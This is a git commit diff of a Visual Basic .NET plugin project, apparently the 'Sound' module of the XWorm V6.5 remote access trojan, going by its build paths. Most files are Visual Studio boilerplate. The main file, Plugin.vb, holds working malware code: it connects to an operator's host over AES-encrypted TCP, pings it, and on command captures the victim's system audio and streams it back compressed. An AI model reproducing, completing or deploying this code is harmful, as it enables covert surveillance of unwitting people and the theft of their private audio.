initial commit
This commit is contained in:
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,22 @@
|
||||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio 14
|
||||
VisualStudioVersion = 14.0.25420.1
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "Sound", "Sound\Sound.vbproj", "{633ADE16-1C92-4F3E-8366-82DD3BAA62F5}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{633ADE16-1C92-4F3E-8366-82DD3BAA62F5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{633ADE16-1C92-4F3E-8366-82DD3BAA62F5}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{633ADE16-1C92-4F3E-8366-82DD3BAA62F5}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{633ADE16-1C92-4F3E-8366-82DD3BAA62F5}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
||||
@@ -0,0 +1 @@
|
||||
{"RootPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\Sound\\Sound","ProjectFileName":"Sound.vbproj","Configuration":"Debug|AnyCPU","FrameworkPath":"","Sources":[{"SourceFile":"Plugin.vb"},{"SourceFile":"My Project\\AssemblyInfo.vb"},{"SourceFile":"My Project\\Application.Designer.vb"},{"SourceFile":"My Project\\Resources.Designer.vb"},{"SourceFile":"My Project\\Settings.Designer.vb"},{"SourceFile":"obj\\Debug\\.NETFramework,Version=v4.8.AssemblyAttributes.vb"}],"References":[{"Reference":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\Sound\\NAudio.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Core.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.DataSetExtensions.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.Linq.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""}],"Analyzers":[],"Outputs":[{"OutputItemFullPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\XWorm\\bin\\Debug\\Plugins\\WSound.dll","OutputItemRelativePath":"WSound.dll"},{"OutputItemFullPath":"","OutputItemRelativePath":""}],"CopyToOutputEntries":[]}
|
||||
@@ -0,0 +1,67 @@
|
||||
<?xml version="1.0" encoding="utf-8" ?>
|
||||
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<!-- -->
|
||||
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
|
||||
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
|
||||
<!-- -->
|
||||
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
|
||||
|
||||
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
|
||||
<ILMergeTransitive>true</ILMergeTransitive>
|
||||
|
||||
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
|
||||
<ILMergeLibraryPath></ILMergeLibraryPath>
|
||||
|
||||
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
|
||||
<ILMergePackagesPath></ILMergePackagesPath>
|
||||
|
||||
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
|
||||
<ILMergeOrderFile></ILMergeOrderFile>
|
||||
|
||||
<!-- The strong key file name if not specified in the project -->
|
||||
<ILMergeKeyFile></ILMergeKeyFile>
|
||||
|
||||
<!-- The assembly version if differs for the version of the main assembly -->
|
||||
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
|
||||
|
||||
<!-- added in Version 1.0.4 -->
|
||||
<ILMergeFileAlignment></ILMergeFileAlignment>
|
||||
|
||||
<!-- added in Version 1.0.4, default=none -->
|
||||
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
|
||||
|
||||
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
|
||||
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
|
||||
|
||||
<!-- See ILMerge documentation -->
|
||||
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
|
||||
|
||||
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
|
||||
<ILMergeCopyAttributes></ILMergeCopyAttributes>
|
||||
|
||||
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
|
||||
<ILMergeDebugInfo>false</ILMergeDebugInfo>
|
||||
|
||||
<!-- Target assembly will be delay signed -->
|
||||
<ILMergeDelaySign></ILMergeDelaySign>
|
||||
|
||||
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
|
||||
<ILMergeInternalize></ILMergeInternalize>
|
||||
|
||||
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
|
||||
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
|
||||
|
||||
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
|
||||
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
|
||||
|
||||
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
|
||||
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
|
||||
|
||||
<!-- Types with the same name are all merged into a single type in the target assembly -->
|
||||
<ILMergeUnionMerge></ILMergeUnionMerge>
|
||||
|
||||
<!-- The version of the target framework, default 40 (works for 45 too) -->
|
||||
<ILTargetPlatform></ILTargetPlatform>
|
||||
</PropertyGroup>
|
||||
</Project>
|
||||
@@ -0,0 +1,4 @@
|
||||
# this file contains the partial list of the merged assemblies in the merge order
|
||||
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
|
||||
# and finetune merge order to your satisfaction
|
||||
|
||||
@@ -0,0 +1,13 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
@@ -0,0 +1,10 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
|
||||
<MySubMain>false</MySubMain>
|
||||
<SingleInstance>false</SingleInstance>
|
||||
<ShutdownMode>0</ShutdownMode>
|
||||
<EnableVisualStyles>true</EnableVisualStyles>
|
||||
<AuthenticationMode>0</AuthenticationMode>
|
||||
<ApplicationType>1</ApplicationType>
|
||||
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
|
||||
</MyApplicationData>
|
||||
@@ -0,0 +1,35 @@
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
Imports System.Runtime.InteropServices
|
||||
|
||||
' General Information about an assembly is controlled through the following
|
||||
' set of attributes. Change these attribute values to modify the information
|
||||
' associated with an assembly.
|
||||
|
||||
' Review the values of the assembly attributes
|
||||
|
||||
<Assembly: AssemblyTitle("Sound")>
|
||||
<Assembly: AssemblyDescription("")>
|
||||
<Assembly: AssemblyCompany("")>
|
||||
<Assembly: AssemblyProduct("Sound")>
|
||||
<Assembly: AssemblyCopyright("Copyright © 2022")>
|
||||
<Assembly: AssemblyTrademark("")>
|
||||
|
||||
<Assembly: ComVisible(False)>
|
||||
|
||||
'The following GUID is for the ID of the typelib if this project is exposed to COM
|
||||
<Assembly: Guid("90f8b693-6bda-43ce-8aa1-ab7972a73f53")>
|
||||
|
||||
' Version information for an assembly consists of the following four values:
|
||||
'
|
||||
' Major Version
|
||||
' Minor Version
|
||||
' Build Number
|
||||
' Revision
|
||||
'
|
||||
' You can specify all the values or you can default the Build and Revision Numbers
|
||||
' by using the '*' as shown below:
|
||||
' <Assembly: AssemblyVersion("1.0.*")>
|
||||
|
||||
<Assembly: AssemblyVersion("1.0.0.0")>
|
||||
<Assembly: AssemblyFileVersion("1.0.0.0")>
|
||||
@@ -0,0 +1,63 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
|
||||
Namespace My.Resources
|
||||
|
||||
'This class was auto-generated by the StronglyTypedResourceBuilder
|
||||
'class via a tool like ResGen or Visual Studio.
|
||||
'To add or remove a member, edit your .ResX file then rerun ResGen
|
||||
'with the /str option, or rebuild your VS project.
|
||||
'''<summary>
|
||||
''' A strongly-typed resource class, for looking up localized strings, etc.
|
||||
'''</summary>
|
||||
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0"), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
|
||||
Friend Module Resources
|
||||
|
||||
Private resourceMan As Global.System.Resources.ResourceManager
|
||||
|
||||
Private resourceCulture As Global.System.Globalization.CultureInfo
|
||||
|
||||
'''<summary>
|
||||
''' Returns the cached ResourceManager instance used by this class.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
|
||||
Get
|
||||
If Object.ReferenceEquals(resourceMan, Nothing) Then
|
||||
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Plugin.Resources", GetType(Resources).Assembly)
|
||||
resourceMan = temp
|
||||
End If
|
||||
Return resourceMan
|
||||
End Get
|
||||
End Property
|
||||
|
||||
'''<summary>
|
||||
''' Overrides the current thread's CurrentUICulture property for all
|
||||
''' resource lookups using this strongly typed resource class.
|
||||
'''</summary>
|
||||
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Friend Property Culture() As Global.System.Globalization.CultureInfo
|
||||
Get
|
||||
Return resourceCulture
|
||||
End Get
|
||||
Set
|
||||
resourceCulture = value
|
||||
End Set
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
@@ -0,0 +1,117 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<root>
|
||||
<!--
|
||||
Microsoft ResX Schema
|
||||
|
||||
Version 2.0
|
||||
|
||||
The primary goals of this format is to allow a simple XML format
|
||||
that is mostly human readable. The generation and parsing of the
|
||||
various data types are done through the TypeConverter classes
|
||||
associated with the data types.
|
||||
|
||||
Example:
|
||||
|
||||
... ado.net/XML headers & schema ...
|
||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
||||
<resheader name="version">2.0</resheader>
|
||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
||||
</data>
|
||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
||||
<comment>This is a comment</comment>
|
||||
</data>
|
||||
|
||||
There are any number of "resheader" rows that contain simple
|
||||
name/value pairs.
|
||||
|
||||
Each data row contains a name, and value. The row also contains a
|
||||
type or mimetype. Type corresponds to a .NET class that support
|
||||
text/value conversion through the TypeConverter architecture.
|
||||
Classes that don't support this are serialized and stored with the
|
||||
mimetype set.
|
||||
|
||||
The mimetype is used for serialized objects, and tells the
|
||||
ResXResourceReader how to depersist the object. This is currently not
|
||||
extensible. For a given mimetype the value must be set accordingly:
|
||||
|
||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
||||
that the ResXResourceWriter will generate, however the reader can
|
||||
read any of the formats listed below.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.binary.base64
|
||||
value : The object must be serialized with
|
||||
: System.Serialization.Formatters.Binary.BinaryFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.soap.base64
|
||||
value : The object must be serialized with
|
||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
||||
value : The object must be serialized into a byte array
|
||||
: using a System.ComponentModel.TypeConverter
|
||||
: and then encoded with base64 encoding.
|
||||
-->
|
||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
||||
<xsd:element name="root" msdata:IsDataSet="true">
|
||||
<xsd:complexType>
|
||||
<xsd:choice maxOccurs="unbounded">
|
||||
<xsd:element name="metadata">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" />
|
||||
<xsd:attribute name="type" type="xsd:string" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="assembly">
|
||||
<xsd:complexType>
|
||||
<xsd:attribute name="alias" type="xsd:string" />
|
||||
<xsd:attribute name="name" type="xsd:string" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="data">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
|
||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="resheader">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:choice>
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:schema>
|
||||
<resheader name="resmimetype">
|
||||
<value>text/microsoft-resx</value>
|
||||
</resheader>
|
||||
<resheader name="version">
|
||||
<value>2.0</value>
|
||||
</resheader>
|
||||
<resheader name="reader">
|
||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
<resheader name="writer">
|
||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
</root>
|
||||
+73
@@ -0,0 +1,73 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "17.14.0.0"), _
|
||||
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Partial Friend NotInheritable Class MySettings
|
||||
Inherits Global.System.Configuration.ApplicationSettingsBase
|
||||
|
||||
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings)
|
||||
|
||||
#Region "My.Settings Auto-Save Functionality"
|
||||
#If _MyType = "WindowsForms" Then
|
||||
Private Shared addedHandler As Boolean
|
||||
|
||||
Private Shared addedHandlerLockObject As New Object
|
||||
|
||||
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs)
|
||||
If My.Application.SaveMySettingsOnExit Then
|
||||
My.Settings.Save()
|
||||
End If
|
||||
End Sub
|
||||
#End If
|
||||
#End Region
|
||||
|
||||
Public Shared ReadOnly Property [Default]() As MySettings
|
||||
Get
|
||||
|
||||
#If _MyType = "WindowsForms" Then
|
||||
If Not addedHandler Then
|
||||
SyncLock addedHandlerLockObject
|
||||
If Not addedHandler Then
|
||||
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
|
||||
addedHandler = True
|
||||
End If
|
||||
End SyncLock
|
||||
End If
|
||||
#End If
|
||||
Return defaultInstance
|
||||
End Get
|
||||
End Property
|
||||
End Class
|
||||
End Namespace
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
|
||||
Friend Module MySettingsProperty
|
||||
|
||||
<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
|
||||
Friend ReadOnly Property Settings() As Global.Plugin.My.MySettings
|
||||
Get
|
||||
Return Global.Plugin.My.MySettings.Default
|
||||
End Get
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
@@ -0,0 +1,7 @@
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
|
||||
<Profiles>
|
||||
<Profile Name="(Default)" />
|
||||
</Profiles>
|
||||
<Settings />
|
||||
</SettingsFile>
|
||||
@@ -0,0 +1,328 @@
|
||||
Imports System.IO
|
||||
Imports System.IO.Compression
|
||||
Imports System.Net.Sockets
|
||||
Imports System.Security.Cryptography
|
||||
Imports System.Threading
|
||||
|
||||
Public Class Plugin
|
||||
|
||||
Public Shared T1 As New Threading.Thread(New Threading.ThreadStart(AddressOf ClientSocket.BeginConnect))
|
||||
Public Shared T2 As New Threading.Thread(New Threading.ThreadStart(AddressOf ClientSocket.Ping))
|
||||
|
||||
Public Shared Function Run(ByVal H As String, ByVal P As String, ByVal SL As String, ByVal K As String, ByVal id As String)
|
||||
Try
|
||||
Settings.Host = H
|
||||
Settings.Port = P
|
||||
Settings.SPL = SL
|
||||
Settings.KEY = K
|
||||
Settings.IDD = id
|
||||
T1.Start()
|
||||
T2.Start()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Function
|
||||
End Class
|
||||
Public Class Settings
|
||||
Public Shared Host As String
|
||||
Public Shared Port As String
|
||||
Public Shared KEY As String
|
||||
Public Shared SPL As String
|
||||
Public Shared IDD As String
|
||||
End Class
|
||||
Public Class ClientSocket
|
||||
Public Shared isConnected As Boolean = False
|
||||
Public Shared S As Socket
|
||||
Public Shared BufferLength As Long = Nothing
|
||||
Public Shared Buffer() As Byte
|
||||
Public Shared MS As New MemoryStream
|
||||
Public Shared Sub BeginConnect()
|
||||
S = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
|
||||
BufferLength = -1
|
||||
Buffer = New Byte(0) {}
|
||||
MS = New MemoryStream
|
||||
|
||||
S.ReceiveBufferSize = 50 * 1024
|
||||
S.SendBufferSize = 50 * 1024
|
||||
|
||||
Try
|
||||
S.Connect(Settings.Host, Settings.Port)
|
||||
isConnected = True
|
||||
|
||||
Send("SysSound" & Settings.SPL & Settings.IDD)
|
||||
|
||||
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
|
||||
Catch ex As Exception
|
||||
isDisconnected()
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
Public Shared Sub BeginReceive(ByVal ar As IAsyncResult)
|
||||
If isConnected = False Then isDisconnected()
|
||||
Try
|
||||
Dim Received As Integer = S.EndReceive(ar)
|
||||
If Received > 0 Then
|
||||
If BufferLength = -1 Then
|
||||
If Buffer(0) = 0 Then
|
||||
BufferLength = BS(MS.ToArray)
|
||||
MS.Dispose()
|
||||
MS = New MemoryStream
|
||||
|
||||
If BufferLength = 0 Then
|
||||
BufferLength = -1
|
||||
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
|
||||
Exit Sub
|
||||
End If
|
||||
Buffer = New Byte(BufferLength - 1) {}
|
||||
Else
|
||||
MS.WriteByte(Buffer(0))
|
||||
End If
|
||||
Else
|
||||
MS.Write(Buffer, 0, Received)
|
||||
If (MS.Length = BufferLength) Then
|
||||
|
||||
Dim thread = New Thread(AddressOf BeginRead)
|
||||
thread.Start(MS.ToArray)
|
||||
|
||||
BufferLength = -1
|
||||
MS.Dispose()
|
||||
MS = New MemoryStream
|
||||
Buffer = New Byte(0) {}
|
||||
Else
|
||||
Buffer = New Byte(BufferLength - MS.Length - 1) {}
|
||||
End If
|
||||
End If
|
||||
Else
|
||||
isDisconnected()
|
||||
Exit Sub
|
||||
End If
|
||||
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
|
||||
Catch ex As Exception
|
||||
isDisconnected()
|
||||
Exit Sub
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
Public Shared Sub BeginRead(ByVal b As Byte())
|
||||
Try
|
||||
Messages.Read(b)
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
Public Shared Sub Send(ByVal msg As String)
|
||||
Try
|
||||
Using MS As New MemoryStream
|
||||
Dim B As Byte() = AES_Encryptor(SB(msg))
|
||||
Dim L As Byte() = SB(B.Length & CChar(vbNullChar))
|
||||
|
||||
MS.Write(L, 0, L.Length)
|
||||
MS.Write(B, 0, B.Length)
|
||||
|
||||
S.Poll(-1, SelectMode.SelectWrite)
|
||||
S.Send(MS.ToArray, 0, MS.Length, SocketFlags.None)
|
||||
End Using
|
||||
Catch ex As Exception
|
||||
isDisconnected()
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
Public Shared Sub isDisconnected()
|
||||
isConnected = False
|
||||
Try
|
||||
SoundStop()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
Try
|
||||
S.Close()
|
||||
S.Dispose()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
Try
|
||||
MS.Close()
|
||||
MS.Dispose()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
|
||||
|
||||
Try
|
||||
Plugin.T1.Abort()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
Try
|
||||
Plugin.T2.Abort()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
End Sub
|
||||
|
||||
Public Shared Sub Ping()
|
||||
While True
|
||||
Threading.Thread.Sleep(30 * 1000)
|
||||
Try
|
||||
If S.Connected Then
|
||||
Using MS As New MemoryStream
|
||||
Dim B As Byte() = AES_Encryptor(SB("PING?"))
|
||||
Dim L As Byte() = SB(B.Length & CChar(vbNullChar))
|
||||
|
||||
MS.Write(L, 0, L.Length)
|
||||
MS.Write(B, 0, B.Length)
|
||||
|
||||
S.Poll(-1, SelectMode.SelectWrite)
|
||||
S.Send(MS.ToArray, 0, MS.Length, SocketFlags.None)
|
||||
GC.Collect()
|
||||
End Using
|
||||
End If
|
||||
Catch ex As Exception
|
||||
isDisconnected()
|
||||
End Try
|
||||
End While
|
||||
End Sub
|
||||
End Class
|
||||
|
||||
Public Class Messages
|
||||
Public Shared CH As Boolean
|
||||
Public US As Boolean
|
||||
Public imgR As Boolean
|
||||
Public Shared Sub Read(ByVal b As Byte())
|
||||
Try
|
||||
Dim A As String() = Split(BS(AES_Decryptor(b)), Settings.SPL)
|
||||
Select Case A(0)
|
||||
|
||||
Case "SSound"
|
||||
If Not USs = True Then
|
||||
USs = True
|
||||
sourcestream = New NAudio.Wave.WasapiLoopbackCapture
|
||||
AddHandler sourcestream.DataAvailable, AddressOf audioDataAvailable
|
||||
sourcestream.StartRecording()
|
||||
Sound = True
|
||||
End If
|
||||
|
||||
|
||||
Case "CSound"
|
||||
SoundStop()
|
||||
|
||||
|
||||
Case "ESound"
|
||||
ClientSocket.isDisconnected()
|
||||
|
||||
End Select
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Sub
|
||||
End Class
|
||||
|
||||
Module Helper
|
||||
Public sourcestream As NAudio.Wave.WasapiLoopbackCapture
|
||||
Public USs As Boolean
|
||||
Public Sound As Boolean
|
||||
Public Function SoundStop()
|
||||
If Sound = True Then
|
||||
Try
|
||||
Sound = False
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
Try
|
||||
If sourcestream IsNot Nothing Then
|
||||
sourcestream.StopRecording()
|
||||
sourcestream.Dispose()
|
||||
sourcestream = Nothing
|
||||
End If
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
Try
|
||||
USs = False
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End If
|
||||
|
||||
End Function
|
||||
Public Sub audioDataAvailable(ByVal sender As Object, ByVal e As NAudio.Wave.WaveInEventArgs)
|
||||
Try
|
||||
If Sound = True Then
|
||||
ClientSocket.Send("SNDGet" & Settings.SPL & Convert.ToBase64String(Compress(e.Buffer)) & Settings.SPL & e.BytesRecorded & Settings.SPL & Settings.IDD)
|
||||
GC.Collect()
|
||||
End If
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
Function SB(ByVal s As String) As Byte()
|
||||
Return System.Text.Encoding.UTF8.GetBytes(s)
|
||||
End Function
|
||||
|
||||
Function BS(ByVal b As Byte()) As String
|
||||
Return System.Text.Encoding.UTF8.GetString(b)
|
||||
End Function
|
